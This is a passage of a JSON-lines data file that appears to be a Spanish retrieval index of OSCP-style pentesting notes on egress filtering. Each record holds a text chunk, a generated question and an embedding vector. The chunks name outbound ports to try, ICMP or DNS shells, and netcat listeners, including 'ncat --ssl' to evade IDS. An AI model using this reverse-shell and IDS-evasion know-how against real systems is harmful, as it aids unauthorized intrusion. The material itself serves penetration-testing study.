0.068, -0.01494, -0.00712, -0.01395, 0.02288, 0.05774, -0.01351, 0.01872, -0.04881, -0.05791, 0.0177, 0.03959, 0.07883, 0.04758, 0.01537, -0.09394, -0.06232, 0.05319, 0.02186, -0.00621, 0.12058, 0.01487, 0.08295, 0.00308, 0.05382, -0.01257, -0.04771, -0.02314, -0.07802, 0.11747, 0.01188, -0.02112, 0.07425, 0.01927, -0.01516, 0.05206, 0.00631, -0.02604, -0.04215, 0.02079, 0.02891, 0.06439, -0.02846, -0.02332, 0.0676, -0.03612, 0.00314, 0.03121, 0.04194, -0.02279, -0.02392, -0.06497, 0.03756, 0.03084, 0.04848, 0.03435, -0.06347, -0.04711, -0.02271, 0.00919, 0.01534, -0.02834, -0.00483, 0.01545, -0.0075, 0.04193, -0.02039, 0.0115, 0.06971, 0.0064, -0.00343, 0.01135, -0.0416, 0.07811, -0.07141, -0.025, -0.00396, 0.00964, 0.03883, 0.01812, 0.01644, -0.0364, 0.01555, 0.05506, -0.0101, 0.02454, -0.03616, -0.03175, -0.04363, 0.04183, 0.00198, -0.01291, -0.06119, 0.02765, -0.04595, -0.00973, -0.00169, 0.00792, 0.00943, -0.0781, 0.01006, 0.03969, 0.01396, 0.00474, -0.02333, 0.02261, -0.0358, -0.02293, 0.02447, -0.01373, -0.01012, -0.05281, 0.00033, -0.07116, -0.0607, -0.03487, 0.0058]} -{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## QuΓ© probar (puertos de salida)\n```\n80, 443, 8080, 53, 4444\n```\n- Si **ninguno** funciona β†’ considera una shell por **ICMP** o canal DNS.\n- 53 (DNS) y 443 suelen estar permitidos casi siempre.", "indexar": "quΓ© protocolo de red es mejor para escanear puertos si los comunes no responden?", "v": [0.13565, -0.05492, -0.09853, -0.0917, 0.04321, -0.15219, 0.20613, -0.18737, -0.09895, -0.06727, -0.11936, 0.11079, 0.04876, -0.15233, 0.11505, -0.04135, -0.01886, 0.17892, 0.18282, 0.01219, -0.08132, -0.08121, -0.05971, 0.03949, 0.12838, 0.06943, 0.05366, -0.01961, 0.03156, -0.00653, 0.05863, -0.00799, 0.04329, 0.06078, -0.05097, 0.01684, 0.05173, 0.0523, -0.01683, 0.11187, -0.0693, 0.0001, -0.13771, -0.13341, 0.03286, -0.115, -0.10541, -0.01528, 0.06311, -0.10786, -0.06204, -0.01176, -0.01171, 0.01829, -0.10356, 0.12243, -0.02291, 0.06681, 0.00589, -0.0457, -0.03984, -0.03808, 0.0422, 3e-05, -0.04003, -0.08708, -0.01827, 0.03898, -0.0534, 0.0267, 0.01637, 0.07278, -0.01894, 0.09329, 0.0341, -0.04539, -0.06589, -0.00622, 0.05855, 0.12812, 0.07391, 0.02364, -0.01755, 0.00018, -0.00523, -0.03918, -0.10881, -0.0762, 0.00384, -0.07073, 0.01265, -0.09428, -0.01016, 0.02324, 0.08594, -0.08468, 0.00278, 0.07662, 0.03207, 0.07835, 0.00257, -0.02986, -0.07296, 0.01778, 0.00665, 0.06889, 0.0005, -0.0882, 0.07507, -0.00471, 0.0147, -0.01014, 0.03793, -0.01748, -0.07014, -0.02927, -0.03132, -0.0388, -0.04192, 0.08034, -0.05275, -0.04135, -0.07696, -0.03625, 0.0076, -0.04502, 0.05987, 0.07446, 0.07824, 0.05402, -0.08673, -0.04586, -0.05809, -0.04504, -0.07143, 0.00675, 0.02965, -0.10669, -0.02372, -0.01927, -0.06538, 0.03964, -0.16543, 0.02132, 0.00992, 0.03004, 0.09308, -0.04718, -0.09711, 0.04933, 0.03156, 0.09206, -0.06516, -0.04779, -0.07755, 0.0867, 0.10286, -0.07619, -0.01025, 0.10381, -0.02049, -0.03412, -0.00018, 0.00902, 0.04546, -0.01457, -0.0061, -0.06139, 0.02551, -0.04331, 0.08698, 0.07763, -0.07376, -0.0721, -0.00646, 0.02191, -0.05589, -0.09328, -0.03798, -0.02948, -0.01914, 0.06809, -0.00329, -0.03283, 0.03147, -0.08245, 0.01542, -0.03102, 0.0238, 0.05245, -0.00558, -0.04037, 0.0445, 0.07483, 0.00583, 0.0202, 0.02485, -0.02108, -0.06025, -0.01522, -0.00611, 0.02729, 0.04932, -0.05075, 0.02727, 0.03697, -0.08891, 0.00688, 0.05275, 0.09334, -0.02463, 0.02532, 0.0023, 0.00794, -0.04551, -0.01862, -0.0073, 0.0672, 0.06348, -0.02924, 0.04757, 0.00552, -0.03504, -0.00041, -0.0526, -0.01011, -0.0253, 0.03489, 0.04772, 0.00882, 0.07137, -0.02102, -0.05911, 0.01005, -0.03747, 0.05137, -0.01205, -0.01358, 0.01495, -0.0253, 0.03719, 0.00115, -0.062, -0.02678, 0.04793, -0.02849, -0.04269, 0.01525, 0.03297, 0.00409, -0.01866, 0.0049, 0.00619, 0.00026, 0.03948, -0.04748]} -{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## QuΓ© probar (puertos de salida)\n```\n80, 443, 8080, 53, 4444\n```\n- Si **ninguno** funciona β†’ considera una shell por **ICMP** o canal DNS.\n- 53 (DNS) y 443 suelen estar permitidos casi siempre.", "indexar": "cΓ³mo puedo usar la shell ICMP o DNS como alternativa a los puertos estΓ‘ndar?", "v": [0.04444, -0.01077, -0.10122, -0.10376, 0.00616, -0.11949, -0.00031, -0.11529, -0.25655, 0.1152, -0.01413, -0.04136, -0.02667, -0.17426, -0.09997, -0.02512, 0.04943, -0.04773, 0.0335, -0.08752, -0.1784, -0.09559, -0.20319, 0.02526, -0.02827, 0.07434, -0.12247, 0.00279, -0.14459, -0.05282, -0.05076, -0.11439, 0.03387, 0.00227, -0.14391, -0.15511, -0.02199, 0.04748, 0.07371, 0.06135, 0.02489, 0.01989, -0.07406, 0.00294, 0.11466, -0.03361, -0.02668, -0.0502, 0.04348, -0.10895, -0.08595, 0.00371, -0.13881, 0.07531, -0.03115, 0.10223, 0.13282, -0.05322, 0.02506, -0.09165, -0.15068, 0.05926, 0.00166, 0.03218, 0.05395, -0.07813, -0.11861, -0.03328, -0.15163, -0.02706, 0.00035, 0.00621, 0.04864, -0.00688, 0.03847, 0.01645, 0.00328, -0.04362, 0.17304, 0.03063, 0.0416, -0.04682, -0.06455, 0.06194, -0.06952, -0.03626, 0.02895, -0.1128, 0.01979, -0.109, 0.06696, -0.0041, 0.00638, 0.11582, 0.01563, -0.06978, 0.00748, 0.02488, -0.02671, -0.00142, 0.08246, 0.13743, -0.05122, 0.07755, 0.05629, -0.00732, 0.07701, -0.05597, 0.06728, 0.01204, 0.00624, 0.07371, -0.07246, -0.04196, -0.01537, -0.01246, -0.00729, -0.12208, -0.02494, -0.00435, -0.0047, -0.09953, -0.05956, 0.04176, 0.05238, 0.03539, 0.00355, 0.02319, 0.0116, -0.01253, 0.0116, -0.05911, -0.07847, -0.08566, -0.05993, 0.02152, 0.03409, -0.09097, 0.02773, -0.06675, -0.04011, 0.07869, -0.07812, -0.07595, 0.07634, -0.00912, 0.01777, -0.05368, -0.10085, -0.0141, 0.0284, 0.0356, -0.0365, 0.02217, -0.11132, -0.01966, 0.04394, -0.04889, -0.0044, 0.08642, -0.04026, -0.01606, 0.00844, 0.02874, 0.0186, -0.00953, -0.03943, -0.03545, 0.02843, -0.0035, 0.01419, 0.08668, -0.03756, -0.05631, 0.05557, -0.0324, -0.04909, -0.0524, 0.0348, 0.00857, 0.01193, 0.01425, -0.04313, -0.00167, -0.01828, -0.04816, 0.0267, -0.02786, -0.03093, 0.05066, 0.02547, 0.05349, -0.01308, -0.00805, -0.05184, -0.00845, -0.00988, -0.07721, -0.00597, -0.00769, 0.0365, 0.01016, 0.07705, -0.07787, 0.0346, -0.0064, -0.06283, 0.04989, -0.01074, 0.05897, 0.00222, -0.05454, 0.0512, 0.01179, -0.05416, 0.0236, -0.02257, -0.00502, -0.01895, 0.02215, -0.02393, 0.06381, 0.00012, 0.03681, 0.02191, -0.00788, 0.01074, 0.01368, 0.00368, 0.05429, 0.03717, 0.04588, -0.03669, -0.03607, 0.02533, 0.01235, -0.00029, 0.0101, -0.01335, -0.02541, 0.01817, 0.0079, -0.02479, -0.01496, 0.04502, -0.0307, -0.04366, 0.01839, 0.03382, -0.03113, -0.01521, 0.01582, 0.04924, -0.00405, -0.00284, 0.00862]} -{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## QuΓ© probar (puertos de salida)\n```\n80, 443, 8080, 53, 4444\n```\n- Si **ninguno** funciona β†’ considera una shell por **ICMP** o canal DNS.\n- 53 (DNS) y 443 suelen estar permitidos casi siempre.", "indexar": "cuΓ‘les son los puertos que usualmente estΓ‘n permitidos en la mayorΓ­a de las redes?", "v": [0.26714, 0.15823, 0.08161, 0.12364, 0.03204, 0.02516, 0.1273, -0.11582, -0.07143, -0.15421, -0.088, 0.02237, 0.11035, -0.05437, 0.05654, -0.04917, -0.03077, 0.01918, 0.05785, -0.02212, -0.06776, -0.11563, -0.06699, -0.00623, -0.0421, -0.04193, 0.13094, 0.00274, -0.17033, 0.05815, -0.00862, 0.00187, 0.06318, -0.06693, 0.00584, -0.07428, -0.01786, 0.17296, -0.01902, 0.04576, 0.04371, 0.03538, -0.07552, -0.15997, 0.11867, 0.01335, -0.21044, -0.0665, -0.00511, -0.12092, -0.06938, 0.06272, -0.0585, -0.02125, -0.07767, -0.00955, 0.0312, 0.0342, 0.00747, -0.01185, -0.07065, 0.03836, 0.02036, 0.00102, 0.02316, -0.06815, -0.07606, 0.09476, -0.06393, 0.04604, 0.0386, -0.01503, -0.02956, 0.07248, 0.06365, 0.0954, -0.06217, 0.02426, 0.00985, 0.03514, 0.06341, -0.06716, -0.05636, -0.05431, -0.06558, -0.05743, -0.02014, -0.10141, -0.03438, -0.09319, 0.06608, -0.03008, -0.0237, 0.03729, 0.01837, -0.01799, -0.02844, 0.03083, 0.02386, -0.02295, 0.03692, 0.04892, -0.01687, 0.08333, -0.02803, 0.05378, 0.04261, -0.15126, 0.03457, -0.03665, 0.03523, 0.05015, 0.01319, -0.03135, -0.02172, 0.01112, -0.01969, -0.09885, 0.01886, -0.03503, -0.04561, -0.11635, -0.02813, -0.00198, 0.01679, -0.01492, -0.01744, 0.13427, 0.05311, -0.01464, 0.02386, 0.00508, -0.04934, -0.02823, -0.09384, -0.03348, -0.02402, -0.07715, -0.05557, -0.03933, -0.01389, 0.04226, -0.06993, -0.05161, 0.07877, 0.05547, 0.03338, -0.07217, -0.10314, -0.0066, 0.01121, 0.09869, -0.03367, 0.00735, -0.0241, 0.13613, -0.06458, -0.12706, 0.01985, 0.06906, 0.00788, 0.0199, -0.0586, 0.03343, 0.04995, 0.00722, -0.08772, 0.04398, 0.05195, -0.01591, -0.06481, 0.14085, -0.09113, -0.04072, 0.02757, 0.0116, 0.0018, -0.05334, -0.02269, -0.0204, -0.06275, 0.03024, -0.04442, -0.03166, -0.00294, -0.04696, 0.02673, -0.02603, -0.01314, 0.0993, -0.00939, 0.00858, -0.01058, 0.00741, 0.04288, -0.04548, -0.01368, 0.0268, 0.0099, -0.03807, -0.02834, -0.02388, 0.02831, -0.05978, 0.04537, 0.02737, -0.09801, 0.01037, 0.01554, 0.05807, 0.01147, -0.0837, 0.03487, -0.04682, -0.04227, 0.02019, 0.00749, -0.08005, 0.0356, 0.06138, 0.01635, 0.05305, 0.02857, -0.00626, -0.01317, 0.02247, 0.01478, 0.00968, 0.04453, 0.0408, 0.01885, -0.03345, -0.08448, -0.05465, 0.00299, 0.0204, -0.03276, -0.0431, -0.04028, -0.01303, 0.04445, 0.00881, 0.00842, -0.01216, 0.03923, -0.06538, -0.07017, 0.06638, 0.00043, -0.06286, -0.04894, 0.08114, 0.07182, -0.03277, 0.03541, -0.09174]} -{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Listener correcto segΓΊn objetivo\n```\nnc clΓ‘sico β†’ vΓ­ctima Linux\nncat --ssl β†’ evadir IDS\nstty raw -echo+nc β†’ Windows ConPtyShell\n```", "indexar": "que herramienta sirve para escuchar conexiones en Linux y Windows?", "v": [0.00984, 0.12527, -0.14634, -0.23885, -6e-05, -0.16756, -0.25315, 0.02262, 0.04891, -0.05093, -0.01584, -0.09597, -0.01968, -0.06682, 0.00318, -0.00498, 0.00369, -0.10057, -0.04041, -0.08201, -0.027, 0.10856, -0.18386, 0.023, -0.00832, 0.04357, 0.12225, -0.11602, -0.03085, 0.10035, -0.06694, 0.0122, 0.01805, 0.05235, -0.10284, 0.03592, -0.01758, 0.14474, 0.12389, 0.11209, 0.06744, 0.06777, -0.03229, 0.06537, 0.01215, -0.10914, 0.04382, -0.04469, 0.08857, 0.03906, -0.04167, -0.05916, -0.09437, -0.02744, 0.06011, -0.06477, 0.17922, -0.1617, 0.04762, -0.03757, -0.19364, 0.02399, -0.01724, -0.03985, 0.04251, 0.01489, 0.0143, -0.05745, -0.05701, 0.11952, -0.09746, 0.0841, 0.05359, 0.01418, 0.06209, 0.02427, -0.05798, 0.02996, 0.09191, 0.00848, 0.10797, 0.00229, -0.00786, -0.04927, -0.08226, -0.0821, 0.07521, 0.01717, -0.01681, -0.00703, 0.01106, 0.05755, -0.0377, 0.07201, 0.09937, -0.0084, 0.05458, -0.00372, 0.00966, -0.01223, 0.06498, -0.01348, -0.07281, 0.07926, -0.00307, 0.02258, 0.02484, -0.0847, -0.03732, -0.01958, 0.03081, 0.05669, 0.03509, -0.00282, -0.06061, -0.06953, -0.04027, -0.03321, -0.01449, 0.04479, 0.0318, 0.02482, -0.07289, 0.01304, -0.07777, -0.0386, -0.04519, 0.11331, -0.03356, -0.06162, 0.09, -0.10658, -0.01128, -0.04248, -0.02519, -0.00389, 0.01642, -0.13485, 0.02147, -0.05257, 0.09082, 0.09259, -0.00232, -0.02463, 0.04455, 0.00533, 0.0574, 0.01719, 0.01629, -0.07045, 0.01374, -0.04249, -0.0601, -0.02688, -0.0651, -0.01549, 0.01388, 0.06892, -0.04605, -0.02014, -0.03928, -0.04857, 0.04862, -0.04053, -0.00759, -0.03824, -0.01604, 0.08583, 0.08571, -0.00468, -0.00779, 0.02828, 0.04308, -0.05019, -0.08532, -0.08297, 9e-05, -0.01245, 0.02765, -0.0311, -0.08266, -0.0003, -0.02947, -0.09204, 0.03758, 0.03911, -0.05968, 0.00386, -0.05165, 0.01597, -0.03547, 0.00133, 0.02785, -0.03682, 0.02656, 0.01227, -0.03135, -0.05134, -0.00811, 0.0335, -0.09912, 0.00684, -0.03861, -0.05462, 0.07897, 0.06641, -0.03099, -0.01283, 0.03065, 0.05922, 0.03491, 0.02273, -0.00755, -0.01194, 0.01057, -0.06061, 0.02189, 0.0412, 0.00346, 0.03021, -0.00661, 0.00122, 0.0607, 0.00156, 0.01085, -0.03786, -0.03126, -0.02693, 0.01501, -0.02528, 0.01611, 0.00652, 0.02822, 0.02837, -0.026, -0.04812, -0.00083, 0.01961, -0.0438, -0.02135, -0.05451, 0.06047, -0.00556, -0.064, -0.05922, -0.05044, -0.00542, -0.00933, -0.04047, -0.07405, -0.03322, -0.00482, 0.06432, -0.00922, -0.01176, 0.04831]} -{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Listener correcto segΓΊn objetivo\n```\nnc clΓ‘sico β†’ vΓ­ctima Linux\nncat --ssl β†’ evadir IDS\nstty raw -echo+nc β†’ Windows ConPtyShell\n```", "indexar": "con quΓ© puedo montar una terminal sin eco en el sistema de Windows?", "v": [-0.10057, -0.00725, -0.15056, -0.10553, -0.03066, -0.03278, -0.08207, 0.02491, -0.06936, -0.11239, -0.2053, -0.04295, 0.02681, -0.02044, 0.04782, 0.04621, 0.011, -0.10259, 0.06196, 0.00851, -0.11427, -0.0729, -0.0288, 0.02784, 0.10395, 0.14772, -0.09852, -0.06537, -0.14596, 0.02978, 0.09945, 0.09888, 0.12136, -0.08741, -0.01746, 0.03021, 0.05356, 0.03629, 0.09368, -0.02332, -0.00136, -0.02097, -0.00382, 0.07067, 0.09489, -0.08836, 0.13019, -0.09415, 0.13109, -0.07497, -0.06298, -0.00247, -0.12733, 0.00627, 0.11586, -0.08573, 0.07582, -0.05606, 0.17982, 0.01262, 0.03267, 0.20768, 0.01158, 0.12282, 0.04524, 0.0136, -0.00056, 0.07787, -0.018, 0.0909, -0.00363, -0.06354, 0.11527, -0.00614, 0.05835, 0.10889, -0.03346, -0.0122, 0.16133, 0.07047, 0.00512, 0.04095, -0.01935, -0.04181, 0.0445, -0.08515, -0.08186, 0.04657, 0.00924, -0.04517, 0.03736, -0.0574, 0.04445, 0.06013, 0.02408, -0.1332, -0.06761, 0.06214, -0.05355, 0.06461, -0.06147, -0.02242, -0.05738, 0.07976, 0.00358, -0.04838, 0.0299, -0.10469, -0.00015, -0.02243, 0.03909, 0.07718, 0.03237, -0.03333, -0.09085, -0.05578, -0.00536, 0.02781, -0.09197, 0.03076, -0.10419, 0.07497, 0.03559, -0.04402, 0.10844, -0.02332, 0.03972, 0.14772, 0.00888, 0.03251, 0.07466, -0.00535, -0.03211, -0.03698, -0.07903, -0.0195, 0.02382, -0.02031, -0.03449, 0.00346, 0.01035, 0.09016, 0.00872, -0.00073, 0.04365, 0.05916, 0.01608, -0.03144, -0.04445, -0.08527, 0.07274, 0.04084, -0.02639, -0.06432, -0.07901, -0.00657, 0.06705, 0.06717, 0.01363, -0.00737, 0.01583, -0.05073, -0.06282, 0.04331, 0.0084, 0.00433, -0.05787, -0.04224, 0.01261, -0.0368, 0.01318, 0.05192, 0.01709, -0.00189, 0.05548, 0.01151, 0.01244, -0.05904, 0.03305, 0.03686, -0.09684, 0.06534, 0.03331, -0.00369, -0.03057, 0.01125, -0.02341, 0.05598, 0.00215, 0.07935, 0.07852, 0.0202, 0.02396, 0.03584, 0.02096, -0.0464, -0.02379, -0.044, -0.01603, 0.0216, -0.04737, 0.06157, 0.04005, -0.05356, 0.1152, 0.04522, -0.05203, 0.06187, 0.08485, 0.07512, 0.002, 0.00985, 0.00652, -0.02322, -0.02582, -0.0481, -0.0292, 0.02963, -0.00044, 0.01467, 0.04494, -0.00441, 0.07466, 0.06246, -0.00992, -0.02271, -0.02661, 0.02321, 0.0159, -0.02682, -0.01099, -0.04646, -0.00517, 0.00326, 0.00243, -0.00777, 0.04641, -0.02519, -0.03551, -0.03079, 0.01821, 0.0745, 0.03455, -0.06977, -0.03073, -0.02899, -0.0189, 0.00539, 0.02833, -0.07145, -0.06556, 0.00075, -0.01841, -0.03915, -0.06282, 0.04087]} -{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Listener correcto segΓΊn objetivo\n```\nnc clΓ‘sico β†’ vΓ­ctima Linux\nncat --ssl β†’ evadir IDS\nstty raw -echo+nc β†’ Windows ConPtyShell\n```", "indexar": "cual es la alternativa a nc si quiero evadir sistemas de detecciΓ³n", "v": [-0.00428, -0.01154, -0.14723, 0.00909, 0.03455, 0.00249, -0.04132, -0.08217, -0.09567, -0.02099, -0.06377, -0.2403, -0.10999, -0.04059, 0.06413, 0.06108, 0.13821, -0.04034, 0.12131, 0.00102, -0.12838, -0.08345, -0.12221, -0.02105, 0.01575, 0.12568, -0.23117, 0.1295, 0.02286, 0.08133, 0.01967, 0.01923, 0.12822, 0.00486, -0.13262, 0.13038, 0.02749, -0.0929, 0.06038, -0.03945, 0.04402, -0.03235, 0.00102, -0.03711, 0.04201, -0.17903, -0.05296, -0.05339, -0.0166, -0.07734, -0.14694, 0.10233, -0.20387, -0.01442, 0.00346, -0.08407, 0.02012, 0.01079, 0.08434, -0.02108, -0.11122, 0.06045, 0.04594, 0.00109, 0.05744, 0.05085, -0.02864, -0.0674, -0.12445, -0.06264, 0.06971, 0.00699, 0.0389, -0.04661, 0.05364, 0.02796, 0.02615, -0.00058, 0.03884, -0.01194, -0.06378, 0.02453, -0.01647, 0.06354, -0.11335, -0.05758, 0.00359, -0.02634, 0.01536, -0.00758, -0.03156, -0.03426, 0.03992, 0.08715, 0.06426, -0.1004, 0.0099, 0.09699, -0.02905, 0.07587, 0.09357, -0.06094, -0.11662, 0.04349, -0.0408, -0.08028, 0.01314, 0.0468, 0.03535, -0.03438, 0.02784, 0.01654, -0.00477, -0.08302, -0.00392, -0.06197, 0.02721, 0.02462, -0.10432, -0.05687, -0.11836, 0.01763, -0.00607, -0.15728, 0.11744, -0.06585, -0.0014, 0.04068, -0.04085, 0.02668, 0.04617, -0.00709, -0.03652, -0.05433, -0.08071, -0.04926, 0.03964, -0.02007, -0.00946, -0.04533, -0.01641, -0.00705, 0.03146, -0.06042, 0.05773, -0.01745, 0.07562, -0.09617, 0.02064, -0.06271, -0.03988, 0.02269, -0.10875, 0.04575, -0.02223, 0.02082, -0.00397, -0.02916, -0.03551, 0.01948, 0.04705, -0.0133, -0.03299, 0.04312, -0.04129, -0.01975, -0.00667, -0.08023, 0.03491, 0.01755, 0.06554, 0.03022, 0.02407, -0.10864, 0.01699, -0.03754, 0.00144, -0.13545, 0.01114, 0.0163, -0.01857, 0.04563, -0.03803, -0.04989, 0.01073, -0.01532, 0.01408, -0.02525, 0.0217, 0.06482, 0.06175, -0.05962, -0.07826, -0.03206, -0.05141, -0.02314, -0.00617, -0.07847, 0.0264, 0.00626, -0.08306, 0.04063, 0.03569, -0.03829, 0.00501, 0.08566, -0.00814, -0.01812, 0.00125, -0.01922, 0.07507, 0.0329, 0.01137, -0.01307, -0.05888, -0.03834, -0.04144, 0.02505, 0.00349, -0.02436, -0.00163, -0.01542, 0.00957, 0.07526, -0.02169, -0.01153, 0.00315, 0.07114, 0.02662, -0.03251, 0.01698, -0.08032, 0.04239, 0.03471, -0.00888, -0.04612, 0.01052, -0.04559, -0.01852, -0.01715, 0.06016, 0.06911, -0.02475, -0.02331, 0.02179, 0.02448, -0.04851, -0.02745, -0.02029, -0.02622, -0.01809, 0.01522, 0.00918, 0.00395, 0.076, -0.02592]} -{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Regla\nDescubre el egress **pronto** (GestiΓ³n del tiempo): perder 2h pensando que el exploit no va, cuando es el firewall, es clΓ‘sico.\n\nRelacionado: Reverse shell Β· Puesto de mando Kali Β· OSCP MOC", "indexar": "que herramienta sirve para gestionar el tiempo de espera en las pruebas de pentesting", "v": [-0.00732, 0.10852, -0.25146, -0.23165, 0.05658, -0.02073, -0.11555, -0.02628, 0.06861, -0.12441, -0.10912, 0.06196, 0.0196, -0.08303, 0.00582, 0.12336, 0.04785, -0.09053, 0.06534, -0.02119, -0.10359, 0.01331, -0.08172, -0.05602, -0.08689, 0.03452, 0.09064, -0.01614, -0.14251, 0.12412, -0.05254, 0.07798, 0.0388, -0.07808, 0.00337, 0.00089, -0.08312, 0.05623, 0.02107, 0.12535, 0.00113, -0.01254, -0.04236, 0.00429, 0.05104, -0.00752, 0.02616, 0.06931, 0.00132, 0.06845, -0.12448, -0.14298, -0.02957, 0.02789, -0.04326, -0.05224, 0.13883, -0.1651, 0.00609, -0.18011, -0.03455, 0.00587, -0.03432, -0.00771, 0.05065, -0.0631, 0.08875, 0.01303, -0.09412, 0.04326, -0.08955, 0.06748, 0.03726, -0.01541, -0.04789, -0.07315, 0.0675, 0.16186, -0.00994, -0.05096, 0.01906, 0.01996, -0.10364, 0.05874, -0.05054, -0.10447, 0.04307, -0.03865, -0.03722, -0.02782, -0.04717, 0.02779, 0.0432, -0.00594, 0.03785, 0.03314, 0.02424, -0.05359, 0.11643, -0.05647, 0.18497, -0.01591, -0.06401, 0.04178, -0.08404, 0.03119, 0.02165, -0.00772, -0.00094, -0.06813, 0.02282, 0.04829, -0.04006, 0.01267, -0.03124, 0.0754, 0.05714, -0.09357, -0.08849, -0.06809, 0.06695, 0.03773, -0.08903, -0.01228, 0.02043, -0.04126, 0.07221, -0.00549, 0.04257, -0.03068, 0.03655, -0.00385, -0.10059, 0.02091, -0.04944, -0.01548, -0.04608, -0.06047, -0.0225, -0.05795, -0.07544, 0.09765, -0.0007, -0.10211, 0.06554, -0.04811, -0.03888, -0.0178, 0.00874, -0.0388, 0.01962, -0.10178, -0.00055, 0.05318, -0.08899, -0.02308, 0.00713, 0.0464, -0.10267, -0.02728, -0.07771, -0.04583, -0.01006, 0.02201, 0.05752, -0.00381, 0.04464, 0.01077, 0.07474, 0.00393, 0.07195, 0.00656, 0.01746, -0.02327, 0.06522, 0.02001, -0.03845, -0.03217, -0.04712, -0.0486, 0.00637, -0.03864, -0.04935, -0.02043, 0.03574, -0.09392, 0.00235, 0.0088, 0.02219, 0.01528, 0.04145, 0.01021, 0.02727, -0.02898, 0.00733, 8e-05, 0.03105, -0.05126, 0.00097, -0.01772, -0.08913, -0.05669, 0.01327, -0.00629, -0.02936, 0.07727, -0.01845, 0.07869, -0.0039, 0.02351, 0.02797, 0.0696, 0.06252, -0.02824, -0.04591, -0.04274, 0.04275, -0.02442, -0.03374, 0.00612, -0.04046, 0.01884, 0.03843, 0.02109, -0.0732, 0.01128, 0.04464, 0.03018, 0.0229, 0.00854, 0.03607, 0.00478, -0.00654, 0.03531, 0.02524, -0.067, 0.10817, -0.03609, -0.00657, -0.05739, 2e-05, 0.07354, 0.00915, 0.01602, -0.0879, -0.02896, -0.03972, -0.056, -0.01564, -0.07215, -0.02134, -0.03198, 0.06173, -0.023, 0.0555, -0.01957]} -{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Regla\nDescubre el egress **pronto** (GestiΓ³n del tiempo): perder 2h pensando que el exploit no va, cuando es el firewall, es clΓ‘sico.\n\nRelacionado: Reverse shell Β· Puesto de mando Kali Β· OSCP MOC", "indexar": "como puedo evitar perder horas pensando que el exploit falla cuando es un problema de firewall", "v": [-0.11568, 0.12317, -0.19758, -0.05215, -0.13178, 0.03649, -0.04263, 0.06375, -0.07691, -0.0204, -0.07288, -0.01075, -0.00788, 0.09084, 0.01004, -0.04156, -0.07816, -0.00238, 0.06361, -0.12273, -0.09639, -0.0261, 0.10207, -0.11807, -0.08441, 0.08639, -0.09603, 0.05464, -0.13326, -0.14199, -3e-05, -0.01139, 0.12489, -0.08538, -0.02801, 0.15467, -0.02024, 0.11524, 0.13231, 0.04006, 0.03307, 0.1093, -0.05973, -0.03804, 0.03881, -0.12871, -0.18658, -0.03019, 0.07617, 0.06014, -0.09684, -0.09058, 0.01878, -0.04768, 0.03032, 0.00882, 0.08608, -0.08554, 0.03358, -0.03962, -0.1458, -0.05439, 0.05463, -0.0033, 0.02404, -0.12187, -0.03153, -0.01106, -0.07443, 0.10318, -0.06269, -0.04278, -0.08393, -0.05877, -0.02285, -0.02304, -0.00056, 0.0077, 0.02839, 0.04487, 0.02554, -0.02534, 0.03086, -0.05676, -0.12163, -0.15087, -0.03192, -0.04321, -0.07478, -0.03294, -0.03717, 0.03652, -0.03621, -0.10163, -0.03202, -0.04444, 0.11482, 0.09676, -0.06265, 0.02666, 0.01258, -0.05362, -0.08146, 0.07347, 0.0272, 0.01239, 0.06855, -0.02752, 0.03579, -0.0796, -0.13777, -0.00788, -0.02313, -0.09213, -0.0577, -0.03538, -0.04945, -0.03967, 0.04882, 0.03133, -0.02951, -0.05927, -0.01866, -0.00518, 0.04086, -0.00869, 0.02175, 0.00638, -0.03262, 0.01986, -0.06617, 0.01747, -0.07376, -0.0165, -0.11881, 0.01816, -0.03731, -0.07025, -0.05249, -0.0477, 0.07655, 0.03541, -0.01359, -0.03122, 0.05673, 0.07983, -0.07608, -0.09688, -0.14267, -0.07262, 0.00296, 0.01102, 0.02184, 0.07067, -0.01696, 0.02965, 0.02787, 0.00137, 0.07682, 0.11468, 0.06362, 0.07689, 0.03774, 0.02921, 0.00054, -0.03804, -0.02497, 0.04207, 0.07364, 0.05306, -0.04798, 0.08713, 0.0125, -0.12905, -0.03448, -0.04314, -0.04819, -0.02397, 0.0375, -0.05239, -0.05039, 0.00621, -0.00723, 0.03859, -0.05827, -0.07344, 0.03677, -0.00472, 0.01279, 0.02222, 0.05562, -0.01209, 0.02703, 0.00498, -0.03833, -0.07352, -0.00919, -0.02023, 0.01878, 0.02401, -0.04282, -0.00769, -0.00508, -0.0075, 0.04021, 0.02037, -0.04089, 0.00936, 0.02075, 0.0044, 0.08233, 0.00665, 0.0701, -0.06677, -0.01335, 0.04791, 0.05423, 0.0604, -0.00377, -0.06131, 0.02186, 0.07713, 0.01382, -0.00183, -0.03719, -0.02313, -0.0277, 0.06195, 0.04342, 0.03719, -0.02306, -0.021, -0.05326, 0.0166, 0.07925, -0.04579, -0.01156, -0.08512, 0.03293, -0.03658, 0.03156, 0.03523, 0.02967, -0.00778, 0.01286, -0.0108, -0.04536, -0.01932, 0.04009, -0.06226, -0.03161, 0.02862, 0.0351, -0.00633, 0.06914, -0.0269]} -{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": 